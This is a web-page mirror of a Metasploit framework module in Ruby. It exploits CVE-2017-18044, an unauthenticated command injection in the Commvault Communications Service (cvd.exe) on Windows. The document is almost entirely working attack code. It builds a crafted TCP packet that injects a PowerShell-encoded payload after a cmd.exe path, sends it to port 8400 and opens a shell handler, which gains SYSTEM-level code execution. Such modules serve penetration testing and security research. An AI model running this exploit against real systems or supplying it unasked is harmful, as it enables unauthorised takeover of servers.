Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/commvault_cmd_exec.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
include Msf::Exploit::Remote::Tcp
9
include Msf::Exploit::Powershell
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Commvault Communications Service (cvd) Command Injection',
16
'Description' => %q{
17
This module exploits a command injection vulnerability
18
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
19
and v10). The vulnerability exists in the cvd.exe service and allows an
20
attacker to execute arbitrary commands in the context of the service. By
21
default, the Commvault Communications service installs and runs as SYSTEM in
22
Windows and does not require authentication. This vulnerability was discovered
23
in the Windows version. The Linux version wasn't tested.
24
},
25
'License' => MSF_LICENSE,
26
'Author' => [
27
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
28
],
29
'References' => [
30
['CVE', '2017-18044'],
31
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
32
],
33
'Platform' => 'win',
34
'Targets' => [
35
[
36
'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
37
{
38
'Arch' => [ARCH_X64, ARCH_X86]
39
}
40
],
41
],
42
'Privileged' => true,
43
'DefaultTarget' => 0,
44
'DisclosureDate' => '2017-12-12',
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
53
register_options([Opt::RPORT(8400)])
54
end
55
56
def exploit
57
buf = build_exploit
58
print_status("Connecting to Commvault Communications Service.")
59
connect
60
print_status("Executing payload")
61
# Send the payload
62
sock.put(buf)
63
# Handle the shell
64
handler
65
disconnect
66
end
67
68
def build_exploit
69
# Get encoded powershell of payload
70
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
71
# Remove additional cmd.exe call
72
psh = "powershell"
73
idx = command.index(psh)
74
command = command[(idx)..-1]
75
76
# Build packet
77
cmd_path = 'C:\Windows\System32\cmd.exe'
78
msg_type = 9
79
zero = 0
80
payload = ""
81
payload += make_nops(8)
82
payload += [msg_type].pack('I>')
83
payload += make_nops(328)
84
payload += cmd_path
85
payload += ";"
86
payload += ' /c "'
87
payload += command
88
payload += '" && echo '
89
payload += "\x00"
90
payload += [zero].pack('I>')
91
92
# Add length header and payload
93
ret_data = [payload.length].pack('I>')
94
ret_data += payload
95
96
ret_data
97
end
98
end
99
100